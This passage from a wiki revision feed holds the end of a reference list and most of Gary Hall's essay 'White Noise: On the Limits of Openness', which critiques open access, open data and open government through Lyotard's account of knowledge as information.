http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Jarvis, J. (2010), ‘Time For Citizens of the Internet to Stand Up’, ''The Guardian: MediaGuardian'', March 29. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; JISC (2009), ‘Press Release: Open Science – the Future for Research?’, posting to the BOAI list, November 16, 2009. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Kerssens, N. and Dekker, A. (2009), ‘Interview with Lev Manovich for Archive 2020’, ''Virtueel Platform''. http://www.virtueelplatform.nl/#2595. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Knouf, N. (2010), ‘The JJPS Extension: Presenting Academic Performance Information’, ''Journal of Journal Performance Studies'', Vol. 1, No. 1. http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Latour, B. (2004), ‘Why Has Critique Run Out of Steam? From Matters of Fact to Matters of Concern’, ''Critical Inquiry'', Vol. 30, No. 2. http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Liu, A. (2011), ‘Where is Cultural Criticism in the Digital Humanities’. Paper presented at the panel on ‘The History and Future of the Digital Humanities’, Modern Language Association convention, Los Angeles, January 7. http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1986), ''The Postmodern Condition: A Report on Knowledge''. Manchester: Manchester University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1991), ''The Inhuman: Reflections on Time''. Cambridge: Polity. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2010), ‘Cultural Analytics Lectures by Manovich in UK (London and Swansea), March 8-9, 2010’, ''Software Studies Initiative''. March 8. http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2011), ‘Trending: The Promises and the Challenges of Big Social Data’, ''Lev Manovich'', April 28. http://www.manovich.net/DOCS/Manovich_trending_paper.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meeks, E. (2010), ‘The Digital Humanities as Imagined Community’, ''Digital Humanities Specialist''. September 14. https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mintel (2010), ‘Energy Efficiency in the Home – UK – July 2010’, Mintel report. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Murray, S., Choi, S., Hoey, J., Kendall, C., Maskalyk, J. and Palepu, A. (2008), ‘Open Science, Open Access and Open Source Software at ''Open Medicine''’, ''Open Medicine'', 2(1): e1–e3. http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/?tool=pmcentrez. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Patterson, M. (2009), ‘Article-Level Metrics at PLoS – Addition of Usage Data’, ''PLoS: Public Library of Science''. September 16. http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Pubget (2010), ‘[BOAI] PLoS Launches Fast (Open) PDF Access with Pubget’, posted on the BOAI list by Peter Suber, March 8. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Poynder, R. 
(2010), ‘Interview With Jean-Claude Bradley: The Impact of Open Notebook Science’, ''Information Today'', September. http://www.infotoday.com/IT/sep10/Poynder.shtml. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2008), ‘Sunset for Ideology, Sunrise for Methodology?’, ''Found History'', March 13. http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010a), ‘Where’s the Beef?: Does Digital Humanities Have to Answer Questions?’, ''Found History'', May 12. http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010b), response to Dan Cohen, ‘Searching for the Victorians’, ''Dan Cohen''. October 5. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Shields, R. (2010), ‘Green Fatigue Hits Campaign to Reduce Carbon Footprint’, ''The Independent'', October 10. http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Sterling, B. (2005), ''Shaping Things''. Cambridge, MA: MIT Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stolberg, S. G. (2009), ‘On First Day, Obama Quickly Sets a New Tone’, ''The New York Times''. January 21. http://www.nytimes.com/2009/01/22/us/politics/22obama.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swan, A. (2009), ‘Open Access and Open Data’, ''2nd NERC Data Management Workshop'', Oxford. February 17-18. http://eprints.ecs.soton.ac.uk/17424/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swartz, A. (2010), ‘When is Transparency Useful?’, ''Aaron Swartz’s Raw Thought blog'', February 11. http://www.aaronsw.com/weblog/usefultransparency. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Vaidhyanathan, S. (2009), ‘The Googlization of Universities’, ''The NEA 2009 Almanac of Higher Education''. http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wark, M. (2004), ''A Hacker Manifesto''. Cambridge, MA: Harvard University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Westcott, S. (2009), ‘Global Warming: Brits Deny Humans are to Blame’, ''The Express'', December 7. http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The White House (2009), ‘Memorandum for the Heads of Executive Departments and Agencies: Transparency and Open Government’. January 21. http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wollen, P. and Cooke, L. (eds) (1995), ''Visual Display: Culture Beyond Appearances''. Seattle: Bay Press.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5507</id>
		<title>Open science/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5507"/>
		<updated>2013-11-19T09:13:06Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: /* Gary Hall */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me Back to the book] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= '''White Noise: On the Limits of Openness (Living Book Mix)'''  =&lt;br /&gt;
&lt;br /&gt;
= Gary Hall  =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;PH54cp2ggFk&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the explicit aims of the Living Books About Life series is to provide a&amp;amp;nbsp; point of interrogation and contestation, as well as connection and translation, between the humanities and the sciences (partly to avoid slipping into 'scientism'). Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from (in this case) ''computer science'' and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being used to produce new ways of approaching and understanding texts in the humanities; what is sometimes thought of as ‘the digital humanities’. The concern in the main has been with either digitizing ‘born analog’ humanities texts and artifacts (e.g. making annotated editions of the art and writing of [http://www.blakearchive.org/blake/ William Blake] available to scholars and researchers online), or gathering together ‘born digital’ humanities texts and artifacts (videos, websites, games, photography, sound recordings, 3D data), and then taking complex and often extremely large-scale data analysis techniques from computing science and related fields and applying them to these humanities texts and artifacts - to this ‘big data’, as it has been called. Witness Lev Manovich and the Software Studies Initiative’s use of ‘[http://www.manovich.net/DOCS/Manovich_trending_paper.pdf digital image analysis and new visualization techniques]’ to study ‘20,000 pages of Science and Popular Science magazines… published between 1872-1922, 780 paintings by van Gogh, 4535 covers of Time magazine (1923-2009) and one million manga pages’ (Manovich, 2011), and Dan Cohen and Fred Gibb’s text mining of ‘[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader the 1,681,161 books that were published in English in the UK in the long nineteenth century]’ (Cohen, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; ''What Digitize Me, Visualize Me, Search Me'' endeavours to show is that such data-focused transformations in research can be seen as part of a major alteration in the status and nature of knowledge. It is an alteration that, according to the philosopher Jean-François Lyotard, has been taking place since at least the 1950s, and involves nothing less than a shift away from a concern with questions of what is right and just, and toward a concern with legitimating power by optimizing the social system’s performance in instrumental, functional terms. This shift has significant consequences for our idea of knowledge. Indeed, for Lyotard: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The nature of knowledge cannot survive unchanged within this context of general transformation. It can fit into the new channels, and become operational, only if learning is translated into quantities of information. We can predict that anything in the constituted body of knowledge that is not translatable in this way will be abandoned and that the direction of new research will be dictated by the possibility of its eventual results being translatable into computer language. The ‘producers’ and users of knowledge must now, and will have to, possess the means of translating into these language whatever they want to invent or learn. Research on translating machines is already well advanced. Along with the hegemony of computers comes a certain logic, and therefore a certain set of prescriptions determining which statements are accepted as ‘knowledge’ statements. (1986: 4)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In particular, ''Digitize Me, Visualize Me, Search Me'' suggests that the turn in the humanities toward data-driven scholarship, science visualization, statistical data analysis, etc. can be placed alongside all those discourses that are being put forward at the moment - in both the academy and society - in the name of greater openness, transparency, efficiency and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Access ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The open access movement provides a case in point. Witness [http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf John Houghton’s] 2009 comparison of the benefits of OA for the United Kingdom, Netherlands and Denmark, which claims to show that the open access academic publishing model, in which peer reviewed scholarly research and publications are made available for free online to all those who are able to access the Internet, is actually the most cost effective mechanism for scholarly publishing. Others meanwhile have detailed the increases open access publishing enables in the amount of material that can be published, searched and stored, in the number of people who can access it, in the impact of that material, the range of its distribution, and in the speed and ease of reporting and information retrieval. The following announcement, posted on the BOAI (Budapest Open Access Initiative) list in March 2010, is fairly typical in this respect: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Today PLoS released Pubget links across its journal sites. Now, when users are browsing thousands of reference citations on PLoS journals they will be able to get to the full text article faster than ever before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Specifically, when readers encounter citations to articles as recorded by CrossRef (which are accessed via the ‘CrossRef’ link in the ‘Cited in’ section of any article’s Metrics tab), a PDF icon will also appear if it is freely available via Pubget. Clicking on the icon will take you directly to the PDF. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On launching this new functionality, Pete Binfield, Publisher of PLoS ONE and the Community Journals said: ‘Any service, like Pubget, that makes it easier for authors to quickly find the information they need is a welcome addition to our articles. We like how Pubget helps to break down content walls in science, letting users get instantly to the article-level detail that they seek.’ (Pubget, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Data ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet it is not just the research literature that is positioned as being rendered more accessible by scientists. Even the data created in the course of scientific research is promoted as being made freely and openly available for others to use, analyse and build upon.This includes data sets that are too large to be included in any resulting peer-reviewed publications. Known as open data, or data-sharing, this initiative is motivated by the idea that publishing data online on an open basis bestows it with a [http://eprints.ecs.soton.ac.uk/17424/1/Swan_-_NERC_09.pptx ‘vastly increased utility’]. Digital data sets are said to be ‘easily passed around’; they are seemingly ‘more easily reused’, reanalysed and checked for accuracy and validity; and they supposedly contain more ‘opportunities for educational and commercial exploitation’ (Swan, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, certain academic publishers are already viewing the linking of their journals to the underlying data as another of the ‘value-added’ services they can offer, to set alongside automatic alerting and sophisticated citation, indexing, searching and linking facilities (and to no doubt help ward off the threat of disintermediation posed by the development of digital technology, which enables academics to take over the means of dissemination and publish their work for and by themselves cheaply and easily). Significantly, a [http://www.jisc.ac.uk/publications/documents/opensciencerpt.aspx 2009 JISC report] also identified ‘open-ness, predictive science based on massive data volumes and citizen involvement as [all] being important features of tomorrow’s research practice’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a further move in this direction, all Public Library of Science (PLoS) journals are now providing a broad range of article-level metrics and indicators relating to usage data on an open basis. No longer withheld as trade secrets, these metrics reveal which articles are attracting the most views, citations from the scholarly literature, social bookmarks, coverage in the media, comments, responses, ‘star’ ratings, blog coverage, and so on. PLoS has positioned this programme as enabling science scholars to assess [http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/ ‘research articles on their own merits rather than on the basis of the journal (and its impact factor) where the work happens to be published’], and they encourage readers to carry out their own analyses of this open data (Patterson, 2009). Yet it is difficult not to perceive such article-level metrics and management tools as also being part of the wider process of transforming knowledge and learning into ‘quantities of information’ (Lyotard, 1986: 4); quantities, furthermore, that are produced more to be exchanged, marketed and sold (1986: 4) – for example, by individual academics to their departments, institutions, funders and governments in the form of indicators of ‘quality’ and ‘impact’ (1986: 5). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''From Open Science to Open Government ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such developments around open access and open data are themselves part of the larger trend or phenomenon that is coming to be known as ‘open science’. As Murray et al put it: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Open science is emerging as a collaborative and transparent approach to research. It is the idea that all data (both published and unpublished) should be freely available, and that private interests should not stymie its use by means of copyright, intellectual property rights and patents. It also embraces open access publishing and open source software… (Murray et al, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting and well known examples of how such open science may work is provided by the Open Notebook Science of the organic chemist Jean-Claude Bradley. ‘[I]in the interests of openness’, Bradley is making the [http://www.infotoday.com/IT/sep10/Poynder.shtml ‘details of every experiment done in his lab freely available on the web']. This ‘includes all the data generated from these experiments too, even the failed experiments’. What is more, he is doing so in ‘real time’, ‘within hours of production, not after the months or years involved in peer review’ (Poynder, 2010). Again, we can see how emphasis is being placed on the amount of research that can be shared, and the speed with which this can be achieved. This openness on Bradley’s part is also positioned as a means of achieving usefulness and impact, as is evident from the very title of one of his Open Notebook Science projects, [http://usefulchem.wikispaces.com/ UsefulChem]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To be fair, however, such discourses around openness, transparency, efficiency and utility are not confined to the sciences – or even the university, for that matter. There are also wider political initiatives, dubbed ‘Open Government’, or ‘Government 2.0’, with both the Labour and the Conservative/Liberal Democrat coalition administrations in the UK making a great display of freeing government information. The Labour government implemented the Freedom of Information (FOI) Act in 2000, and then proceeded to launch a [http://www.data.gov.uk website] expressly dedicated to the release of governmental data sets in January 2010. It is a website that the current Conservative/Liberal Democrat coalition government continues to make extensive use of. In a similar vein, the [http://www.freeourdata.org.uk/ Guardian] newspaper has campaigned for the UK government to relinquish its copyright on all local, regional and national data collected with taxpayers’ money and to make such data freely and openly available to the public by publishing it online, where it can be collectively and collaboratively scrutinized, searched, mined, mapped, graphed, cross-tabulated, visualized, audited and interpreted using software tools. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nor is this phenomenon confined to the UK. In the United States Barack Obama promised throughout his election campaign to make government more open. He followed this up by issuing a memorandum on transparency the very first day after he became President, vowing to make openness one of [http://www.nytimes.com/2009/01/22/us/politics/22obama.html ‘the touchstones of this presidency’”] (Obama, cited in Stolberg, 2009): ‘[http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ My Administration] is committed to creating an unprecedented level of openness in Government. We will work together to ensure the public trust and establish a system of transparency, public participation, and collaboration. Openness will strengthen our democracy and promote efficiency and effectiveness in Government’ (The White House, 2009). 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''The Politics of Openness''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The connection I am making here between the movements for open access, open data, open science and open government is one that has to a certain extent already been pointed to by Michael Gurstein in his reflections on the experience of attending the 2011 conference of the [http://okfn.org/ Open Knowledge Foundation]. For Gurstein: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ the ‘open data/open government’ movement] begins from a profoundly political perspective that government is largely ineffective and inefficient (and possibly corrupt) and that it hides that ineffectiveness and inefficiency (and possible corruption) from public scrutiny through lack of transparency in its operations and particularly in denying to the public access to information (data) about its operations. And further that this access once available would give citizens the means to hold bureaucrats (and their political masters) accountable for their actions. In doing so it would give these self-same citizens a platform on which to undertake (or at least collaborate with) these bureaucrats in certain key and significant activities—planning, analyzing, budgeting that sort of thing. Moreover through the implementation of processes of crowdsourcing this would also provide the bureaucrats with the overwhelming benefits of having access to and input from the knowledge and wisdom of the broader interested public. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Put in somewhat different terms but with essentially the same meaning—it’s the taxpayer’s money and they have the right to participate in overseeing how it is spent. Having “open” access to government’s data/information gives citizens the tools to exercise that right. (Gurstein, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, for Gurstein, a much clearer understanding is needed than has been displayed by many open data/open government advocates to date of what exactly is meant by openness, and of where arguments in favour of open access, open information and open data are likely to lead us in the not too distant future. With this in mind, we could endeavour to put some flesh on the bones of Gurstein’s sketch of the politics of openness and suggest that, from a liberal perspective, freeing publicly funded and acquired information and data – whether it is gathered directly in the process of census collection, or indirectly as part of other activities (crime, healthcare, transport, schools and accident statistics) – is seen as helping society to perform more efficiently. For liberals, openness is said to play a key role in increasing citizen trust, participation and involvement in democracy, and indeed government, as access to information – such as that needed to intervene in public policy – is no longer restricted either to the state or to those corporations, institutions, organizations and individuals who have sufficient money and power to acquire it for themselves. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such liberal beliefs find support in the idea that making information and data freely and transparently available goes along with Article 19 of The Universal Declaration of Human Rights. The latter states that everyone has the right [http://www.un.org/en/documents/udhr/index.shtml ‘to seek, receive and impart information and ideas through any media and regardless of frontiers’]. Hillary Clinton, the United States Secretary of State, put forward a similar vision when, at the beginning of 2010, she said of her country that ‘[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full We stand for a single internet] where all of humanity has equal access to knowledge and ideas’, and against the authoritarian censorship and suppression of free speech and online search facilities like Google in countries such as China and Iran. Clinton declared: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full Even in authoritarian countries], information networks are helping people discover new facts and making governments more accountable. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; During his visit to China in November [2009], President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today. (Clinton, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This political sentiment was shared by Jeff Jarvis, author of ''What Would Google Do?'', when, in support of Google’s decision to stop self-filtering search results in China, he argued in March 2010 for a bill of rights for cyberspace: ‘[http://www.buzzmachine.com/2010/03/27/a-bill-of-rights-in-cyberspace/ to claim and secure our freedom] to connect, speak, assemble, and act online; to each control our identities and data; to speak our languages; to protect what is public and private; and to assure openness’ (Jarvis, 2010: 4). Yet are Clinton and Jarvis not both guilty here of overlooking (or should that be conveniently forgetting or even denying) the way liberal ideas of freedom and openness (and, indeed, of the human) have long been used in the service of colonialism and neoliberal globalisation? Does freedom for the latter not primarily mean economic freedom, i.e., freedom of the market, freedom of the consumer to choose what to consume – not only in terms of goods, but also lifestyles and ways of being? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Even if it was before the widespread use of networked computers, it is interesting that ‘fifteen years after the Freedom of Information Act law was passed’ in the US in 1966, ‘the General Accounting Office reported that 82 percent of requests [for information] came from business, nine percent from the press, and only 1 percent from individuals or public interest groups’ (Fung et al, 2007: 27-28). Certainly, in the UK today, the 'truth is that the [UK] FOI Act [2000] isn't used, for the most part, by “the people”’, as Tony Blair acknowledged in his recent memoir. ‘It's used by journalists’ (Blair, 2010) – and by businesses, one might add. In view of this, it is no surprise to find that neoliberals also support the making of government data freely and openly available to businesses and the public. They do so on the grounds that it provides a means of achieving the best possible ‘input/output ratio’ for society (Lyotard, 1986: 54). This way of thinking is of a piece with the emphasis placed by neoliberalism’s audit culture on accountability, transparency, evaluation, measurement and centralised data management: for example, in the context of UK higher education, it is evident in the emphasis placed on measuring the impact of research on society and the economy, teaching standards, contact hours, as well as student drop-out rates, future employment destinations and earning prospects. From this perspective, such openness and communicative transparency is perceived as ensuring greater value for (taxpayers’) money, supposedly helping to eliminate corruption, enabling costs to be distributed more effectively, and increasing choice, innovation, enterprise, creativity, competiveness and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meanwhile, some libertarians have gone so far as to argue that there is no need to make difficult policy decisions about what data and what information it is right to publish online and what to keep secret at all. Instead, we should work toward the kind of situation the science-fiction writer Bruce Sterling proposes. 
In ''Shaping Things'', his non-fiction book on the future of design, Sterling advocates retaining all data and information, ‘the known, the unknown known, and the unknown unknown’, in large archives and databases equipped with the necessary bandwidth, processing speed and storage capacity, and simply devising search tools and metadata that are accurate, fast and powerful enough to find and access it (Sterling, 2005: 47). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet to have participated in the shift away from questions of truth, justice and especially what, in ''The Inhuman'', Lyotard places under the headings of ‘heterogeneity, dissensus, event…the unharmonizable’ (1991: 4), and ''toward'' a concern with performativity, measurement and optimising the relation between input and output, one does not need to be a practicing [http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data data journalist], or to have actively contributed to the movements for open access, open data, open science or open government. If you are one of the 1.3 million plus people who have purchased a Kindle, and helped the sale of digital books outpace those of hardbacks on Amazon’s US website, then you have already signed a license agreement allowing the online book retailer - but not academic researchers or the public - to collect, store, mine, analyse and extract economic value from data concerning your personal reading habits for free. Similarly, if you are one of the over 687 million worldwide who use the Facebook social network, then you are already voluntarily giving your time and labour for free, not only to help its owners, their investors, and other companies make a reputed $1 billion a year from demographically targeted advertising, but to supply law enforcement agencies such as the NSA in the US and GCHQ in the UK with profile data relating to yourself, your family, friends, colleagues and peers that they can [http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement use in investigations] (Hoffman, 2010). Even if you have done neither, you will in all probability have provided the Google technology company with a host of network data and digital traces it can both monetize and give to the police as a result of having mapped your home, digitized your book, or supplied you with free music videos to enjoy via Google Street View, Google Maps, Google Earth, Google Book Search and YouTube, which Google also owns. Lest this shift from open access to Google should seem somewhat farfetched, it is worth recalling that ‘[http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf Google has moved to establish, embellish, or replace many core university services] such as library databases, search interfaces, and e-mail servers’ (Vaidhyanathan, 2009: 65-66); and that academia in fact gave birth to Google, Google’s PageRank algorithm being little more [http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 ‘than an expansion of what is known as citation analysis’] (Knouf, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;R7yfV6RzE30&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Obviously, no matter how exciting and enjoyable such activities may be, you don't ''have'' to buy that e-book reader, join that social network or display your personal metrics online, from sexual activity to food consumption, in an attempt to identify patterns in your life – what is called life-tracking or self-tracking. 
(Although, actually, a lot of people are quite happy to keep contributing to the networked communities reached by Facebook and YouTube, even though they realise they are being used as free labour and that, in the case of the former, much of what they do cannot be accessed by search engines and web browsers. They just see this as being part of the deal and a reasonable trade-off for the services and experiences that are provided by these companies.) Nevertheless, refusing to take part in this transformation of knowledge and learning into quantities of data, and shift ''away'' from critical questions of what is just and right ''toward'' a concern with optimizing the system’s performance is not an option for most of us. It is not something that can be opted out of by simply declining to take out a Tesco Club Card or use cash-points, refusing to look for research using Google Scholar, or committing social networking [http://www.suicidemachine.org/ ‘suicide’] and reading print-on-paper books instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For one thing, the process of capturing data by means not just of the internet, but a myriad of cameras, sensors and robotic devices, is now so ubiquitous and all pervasive it is impossible to avoid being caught up in it, no matter how rich, knowledgeable and technologically proficient you are. The latest research indicates there are approximately 1.85 million CCTV cameras in the UK – one for every 32 people. Yet no one really knows how many CCTV cameras are actually in operation in Britain today - and that’s without even mentioning other means of gathering data that are reputed to be more intrusive still, such as mobile phone GPS location and automatic vehicle number plate recognition (ANPR). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For another, and as the example of CCTV illustrates, it’s not necessarily a question of actively doing something in this respect: of positively contributing free labour to the likes of Flickr and YouTube, for instance, or of refusing to do so. Nor is it merely a case of the separation between work and non-work being harder to maintain nowadays. (Is it work, leisure or play when you are writing a status update on Facebook, posting a photograph, ‘friending’ someone, interacting, detailing your ‘likes’ and ‘dislikes’ regarding the places you eat, the films you watch, the books you read?) As Gilles Deleuze and Felix Guattari pointed out some time ago, ‘surplus labor no longer requires labor... one may furnish surplus-value without doing any work’, or anything that even remotely resembles work for that matter, at least as it is most commonly understood: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;In these new conditions, it remains true that all labour involves surplus labor; but surplus labor no longer requires labor. Surplus labor, capitalist organization in its entirety, operates less and less by the striation of space-time corresponding to the physicosocial concept of work. Rather, it is as though human alienation through surplus labor were replaced by a generalized ‘machinic enslavement’, such that one may furnish surplus-value without doing any work (children, the retired, the unemployed, television viewers, etc.). Not only does the user as such tend to become an employee, but capitalism operates less on a quantity of labor than by a complex qualitative process bringing into play modes of transportation, urban models, the media, the entertainment industries, ways of perceiving and feeling – every semiotic system. It is as though, at the outcome of the striation that capitalism was able to carry to an unequalled point of perfection, circulating capital necessarily recreated, reconstituted, a sort of smooth space in which the destiny of human beings is recast. ((Deleuze and Guattari, 1988: 492)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Transparency?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Before going any further, I should perhaps confess that I am a staunch advocate of open access in the humanities. Nevertheless, there are a number of issues that need to be raised with regard to making research and data openly available online for free. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The first point to make in this respect is that, far from revealing any hitherto unknown, hidden or secret knowledge, such discourses of openness and transparency are themselves often not very open or transparent. Staying with the relationship between politics and science, let us take as an example the response of Ed Miliband, leader of the UK’s Labour Party, to the [http://en.wikipedia.org/wiki/Climatic_Research_Unit_email_controversy 'Climategate']controversy, in which climate skeptics alleged that emails hacked from the University of East Anglia’s Climatic Research Unit revealed that scientists have tampered with the data in order to support the theory that global warming is man-made. Miliband’s answer was to advocate ‘[http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame maximum transparency]– let’s get the data out there’, he urged. ‘The people who believe that climate change is happening and is man-made have nothing to fear from transparency’ (Miliband, quoted in Westcott, 2009: 7; cited by Birchall,&amp;amp;nbsp;2011b). Yet, actually, complete transparency is impossible. This is because, as Clare Birchall has shown, there is an aporia at the heart of any claim to transparency. ‘For transparency to be known as transparency, there must be some agency (such as the media [or politicians, or 